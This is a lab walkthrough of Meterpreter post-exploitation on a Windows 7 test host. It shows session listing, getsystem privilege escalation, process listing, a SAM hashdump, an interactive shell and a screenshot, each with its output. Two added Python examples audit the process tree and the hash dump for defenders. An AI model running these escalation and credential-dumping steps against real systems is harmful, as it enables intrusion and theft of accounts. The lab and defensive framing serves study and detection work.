Backdoor

The document details the steps to access information and control of a compromised Windows system using Metasploit's Meterpreter shell. It shows how to view session information, system details, current user privileges, list processes, dump password hashes, get a system shell and take a screenshot.
1. Session ID

msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

Id  Name  Type                     Information                Connection
--  ----  ----                     -----------                ----------
1         meterpreter x64/windows  test-PC\victima @ TEST-PC  192.168.2.4:5344 -> 192.168.2.5:49320 (192.168.2.5)

2. Host information

meterpreter > sysinfo


Computer : TEST-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : es_CO
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >

3. User information

meterpreter > getuid


Server username: test-PC\victima
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

4. List processes

meterpreter > ps

Process List
============

PID   PPID  Name               Arch  Session  User                          Path
---   ----  ----               ----  -------  ----                          ----
0     0     [System Process]
4     0     System             x64   0
252   4     smss.exe           x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
288   464   svchost.exe        x64   0        NT AUTHORITY\Servicio de red  C:\Windows\system32\svchost.exe
332   324   csrss.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
368   360   csrss.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
376   324   wininit.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
404   360   winlogon.exe       x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
464   376   services.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
472   376   lsass.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
480   376   lsm.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
552   464   sppsvc.exe         x64   0        NT AUTHORITY\Servicio de red  C:\Windows\system32\sppsvc.exe
576   464   svchost.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
644   464   svchost.exe        x64   0        NT AUTHORITY\Servicio de red  C:\Windows\system32\svchost.exe
732   464   svchost.exe        x64   0        NT AUTHORITY\SERVICIO LOCAL   C:\Windows\System32\svchost.exe
772   464   svchost.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
796   464   svchost.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
940   464   svchost.exe        x64   0        NT AUTHORITY\SERVICIO LOCAL   C:\Windows\system32\svchost.exe
984   368   conhost.exe        x64   1        test-PC\victima               C:\Windows\system32\conhost.exe
1052  464   spoolsv.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
1088  464   svchost.exe        x64   0        NT AUTHORITY\SERVICIO LOCAL   C:\Windows\system32\svchost.exe
1148  3036  powershell.exe     x64   1        test-PC\victima               C:\Windows\System32\WindowsPowerShell\v1.0\POWErshElL.exe
1168  2016  explorer.exe       x64   1        test-PC\victima               C:\Windows\Explorer.EXE
1200  464   svchost.exe        x64   0        NT AUTHORITY\SERVICIO LOCAL   C:\Windows\system32\svchost.exe
1508  2232  powershell.exe     x64   1        test-PC\victima               C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
1668  464   wmpnetwk.exe       x64   0        NT AUTHORITY\Servicio de red  C:\Program Files\Windows Media Player\wmpnetwk.exe
1780  464   SearchIndexer.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchIndexer.exe
1856  3540  powershell.exe     x64   1        test-PC\victima               C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
1968  464   taskhost.exe       x64   1        test-PC\victima               C:\Windows\system32\taskhost.exe
2036  772   dwm.exe            x64   1        test-PC\victima               C:\Windows\system32\Dwm.exe
2112  464   svchost.exe        x64   0        NT AUTHORITY\SERVICIO LOCAL   C:\Windows\System32\svchost.exe
2232  1148  powershell.exe     x64   1        test-PC\victima               C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2248  1508  cmd.exe            x64   1        test-PC\victima               C:\Windows\system32\cmd.exe
2452  732   audiodg.exe        x64   0
2860  1168  cmd.exe            x64   1        test-PC\victima               C:\Windows\system32\cmd.exe
2892  368   conhost.exe        x64   1        test-PC\victima               C:\Windows\system32\conhost.exe
3236  368   conhost.exe        x64   1        test-PC\victima               C:\Windows\system32\conhost.exe
3308  368   conhost.exe        x64   1        test-PC\victima               C:\Windows\system32\conhost.exe
3404  464   svchost.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
3464  1856  powershell.exe     x64   1        test-PC\victima               C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3540  3780  powershell.exe     x64   1        test-PC\victima               C:\Windows\System32\WindowsPowerShell\v1.0\POWErshElL.exe
3780  1168  Troya.exe          x64   1        test-PC\victima               C:\Users\victima\Desktop\Troya.exe

meterpreter >
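For a responder, the value of the listing above is the parent/child relationships: Troya.exe runs from the user's Desktop and is the parent of a powershell.exe, which in turn parents more powershell.exe instances and a cmd.exe. The following is an added example (not part of the original writeup) that parses this `ps` column layout, rebuilds the process tree and flags script interpreters whose parent image lives in a user-writable directory. The sample rows are a constructed subset copied from the listing; the rule "anything under C:\Users\ is user-writable" and the set of interpreter names are assumptions made for the example. Names are compared case-insensitively because the Path column shows the same image as both `powershell.exe` and `POWErshElL.exe`.

```python
"""Rebuild a parent/child process tree from Meterpreter-style `ps` output.

Added example for triage of a listing like the one above; not code from the
original writeup or from Metasploit itself.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample: a subset of the rows from the listing, same column layout.
SAMPLE_PS = r"""
Process List
============

PID   PPID  Name               Arch  Session  User                          Path
---   ----  ----               ----  -------  ----                          ----
0     0     [System Process]
4     0     System             x64   0
252   4     smss.exe           x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
472   376   lsass.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
1148  3036  powershell.exe     x64   1        test-PC\victima               C:\Windows\System32\WindowsPowerShell\v1.0\POWErshElL.exe
1168  2016  explorer.exe       x64   1        test-PC\victima               C:\Windows\Explorer.EXE
1508  2232  powershell.exe     x64   1        test-PC\victima               C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
1668  464   wmpnetwk.exe       x64   0        NT AUTHORITY\Servicio de red  C:\Program Files\Windows Media Player\wmpnetwk.exe
1856  3540  powershell.exe     x64   1        test-PC\victima               C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2232  1148  powershell.exe     x64   1        test-PC\victima               C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2248  1508  cmd.exe            x64   1        test-PC\victima               C:\Windows\system32\cmd.exe
2452  732   audiodg.exe        x64   0
3464  1856  powershell.exe     x64   1        test-PC\victima               C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3540  3780  powershell.exe     x64   1        test-PC\victima               C:\Windows\System32\WindowsPowerShell\v1.0\POWErshElL.exe
3780  1168  Troya.exe          x64   1        test-PC\victima               C:\Users\victima\Desktop\Troya.exe
"""

# Full row: PID PPID Name Arch Session User Path. The user may contain spaces
# ("NT AUTHORITY\SYSTEM"), so it is matched lazily up to a path that starts with a
# drive letter or a bare backslash (\SystemRoot\...). Paths may contain spaces too.
FULL_ROW = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>\S+)\s+(?P<arch>\S+)\s+"
    r"(?P<session>\d+)\s+(?P<user>.+?)\s+(?P<path>(?:[A-Za-z]:)?\\.+?)\s*$"
)
# Short row: kernel/system entries that carry no user or path.
SHORT_ROW = re.compile(r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>\[System Process\]|\S+)")

# Assumption for this example: the interpreters worth tracking in this listing.
INTERPRETERS = {"powershell.exe", "cmd.exe"}


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    name: str
    user: Optional[str] = None
    path: Optional[str] = None


def parse_ps(text: str) -> Dict[int, Proc]:
    """Parse `ps` output into a pid -> Proc map; header and separator lines are skipped."""
    procs: Dict[int, Proc] = {}
    for line in text.splitlines():
        m = FULL_ROW.match(line)
        if m:
            procs[int(m["pid"])] = Proc(int(m["pid"]), int(m["ppid"]), m["name"], m["user"], m["path"])
            continue
        m = SHORT_ROW.match(line)
        if m:
            procs[int(m["pid"])] = Proc(int(m["pid"]), int(m["ppid"]), m["name"])
    return procs


def ancestry(procs: Dict[int, Proc], pid: int) -> List[str]:
    """Image names from `pid` upward, stopping at a parent missing from the snapshot or a cycle."""
    names: List[str] = []
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        names.append(procs[pid].name)
        pid = procs[pid].ppid
    return names


def interpreter_chain_depth(procs: Dict[int, Proc], pid: int) -> int:
    """Count consecutive interpreter processes from `pid` upward (nested shells)."""
    depth = 0
    for name in ancestry(procs, pid):
        if name.lower() not in INTERPRETERS:
            break
        depth += 1
    return depth


def is_user_writable(path: Optional[str]) -> bool:
    # Assumption for this example: anything under C:\Users\ counts as user-writable.
    return path is not None and path.lower().startswith("c:\\users\\")


def interpreters_from_user_dirs(procs: Dict[int, Proc]) -> List[Tuple[int, str, int, str]]:
    """(pid, name, parent pid, parent path) for interpreters whose parent runs from a user directory."""
    findings = []
    for p in procs.values():
        parent = procs.get(p.ppid)
        if parent is None or p.name.lower() not in INTERPRETERS:
            continue
        if is_user_writable(parent.path):
            findings.append((p.pid, p.name, parent.pid, parent.path))
    return sorted(findings)


if __name__ == "__main__":
    procs = parse_ps(SAMPLE_PS)
    for pid, name, ppid, ppath in interpreters_from_user_dirs(procs):
        print(f"{name} (PID {pid}) spawned by PID {ppid} running from {ppath}")
        print("  chain:", " <- ".join(ancestry(procs, pid)),
              f"(interpreter depth {interpreter_chain_depth(procs, pid)})")
```

On the sample, the only hit is PID 3540 (powershell.exe) whose parent is PID 3780, C:\Users\victima\Desktop\Troya.exe. The chain for PID 2248 (cmd.exe) is four interpreters deep and ends at PID 3036, which is not in the snapshot, a reminder that a single `ps` capture misses short-lived parents and that the same logic is better fed from Sysmon or Security log process-creation events, which record the parent at creation time.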

5. Copy the hashes from the SAM

meterpreter > hashdump


Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:1ba39fdd7b6bea2ea561ca8704d6e463:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
victima:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >
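Each record above is in pwdump format, `user:RID:LM hash:NT hash:::`. Two values recur: `aad3b435b51404eeaad3b435b51404ee` is the LM hash of the empty string, which is also what is shown when LM hash storage is disabled, and `31d6cfe0d16ae931b73c59d7e0c089c0` is the NT hash of the empty string, so four of the five accounts in this lab image have no password at all. The following is an added example (not part of the original writeup) of the audit a defender would run over such a dump: it rejoins records that the terminal wrapped across two lines, ignores prompt lines, and reports blank passwords and stored LM hashes. The sample is constructed from the records above plus one made-up `legacy` account whose hashes are placeholders, included only to exercise the LM check.

```python
"""Audit a pwdump-format hash listing for blank passwords and stored LM hashes.

Added example; not code from the original writeup or from Metasploit.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Well-known hashes of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM("") ; also shown when LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT("")
BUILTIN_ADMIN_RID = 500
BUILTIN_GUEST_RID = 501

# A record starts with "user:rid:" and is complete only when it ends in ":::".
RECORD_START = re.compile(r"^[^:]+:\d+:")
RECORD = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample: the records from the dump above as the terminal wrapped them,
# surrounded by prompt noise, plus a made-up "legacy" record with placeholder
# (not real) LM/NT hashes so the LM check has something to find.
SAMPLE_DUMP = """
meterpreter > hashdump
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:1ba39fdd7b6bea2ea561ca8704d6e4
63:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
victima:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy:1004:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
meterpreter >
"""


@dataclass(frozen=True)
class Account:
    user: str
    rid: int
    lm: str
    nt: str


def rejoin_wrapped(text: str) -> List[str]:
    """Glue continuation lines back onto their record; drop lines that are not part of one."""
    records: List[str] = []
    buf = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if RECORD_START.match(line):
            buf = line            # new record (also discards any unterminated junk)
        elif buf:
            buf += line           # continuation of a wrapped record
        else:
            continue              # prompt or other noise before any record
        if buf.endswith(":::"):
            records.append(buf)
            buf = ""
    return records


def parse_hashdump(text: str) -> List[Account]:
    """Parse pwdump-format text into Account objects, hashes normalised to lowercase."""
    accounts = []
    for rec in rejoin_wrapped(text):
        m = RECORD.match(rec)
        if m is None:
            continue
        accounts.append(Account(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return accounts


def blank_password_accounts(accounts: List[Account]) -> List[str]:
    """Accounts whose NT hash is the hash of the empty string."""
    return [a.user for a in accounts if a.nt == EMPTY_NT]


def lm_stored_accounts(accounts: List[Account]) -> List[str]:
    """Accounts that still have a real LM hash stored (LM is trivially crackable)."""
    return [a.user for a in accounts if a.lm != EMPTY_LM]


def audit(accounts: List[Account]) -> List[Tuple[str, str]]:
    """(account, issue) pairs a defender would act on."""
    issues: List[Tuple[str, str]] = []
    for a in accounts:
        if a.nt == EMPTY_NT:
            kind = {BUILTIN_ADMIN_RID: "built-in Administrator", BUILTIN_GUEST_RID: "built-in Guest"}
            issues.append((a.user, f"blank password ({kind.get(a.rid, 'account')}, RID {a.rid})"))
        if a.lm != EMPTY_LM:
            issues.append((a.user, "LM hash stored; set NoLMHash and change the password"))
    return issues


if __name__ == "__main__":
    for user, issue in audit(parse_hashdump(SAMPLE_DUMP)):
        print(f"{user}: {issue}")
```

Against the real dump the audit reports Administrador (RID 500), Invitado (RID 501), test and victima with blank passwords; only HomeGroupUser$ has one set. The dump itself is the detection opportunity: reading the SAM this way requires SYSTEM and touches lsass.exe, so a process other than a known security tool opening lsass.exe with read access (Sysmon event 10) is the signal to alert on.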

6. Start a shell

meterpreter > shell


Process 3916 created.
Channel 2 created.
Microsoft Windows [Versión 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.
C:\Windows\system32>cd /
cd /

C:\>dir
dir
El volumen de la unidad C no tiene etiqueta.
El número de serie del volumen es: 8031-DD9E

Directorio de C:\

13/07/2009  10:20 p.m.    <DIR>          PerfLogs
08/05/2021  12:22 a.m.    <DIR>          Program Files
08/05/2021  12:23 a.m.    <DIR>          Program Files (x86)
08/05/2021  01:38 p.m.    <DIR>          Users
23/04/2021  09:02 p.m.    <DIR>          Windows
               0 archivos              0 bytes
               5 dirs   1.958.588.416 bytes libres

C:\>

7. Take a screenshot

meterpreter > screenshot


Screenshot saved to: /home/kali/MWujvuxO.jpeg
meterpreter >
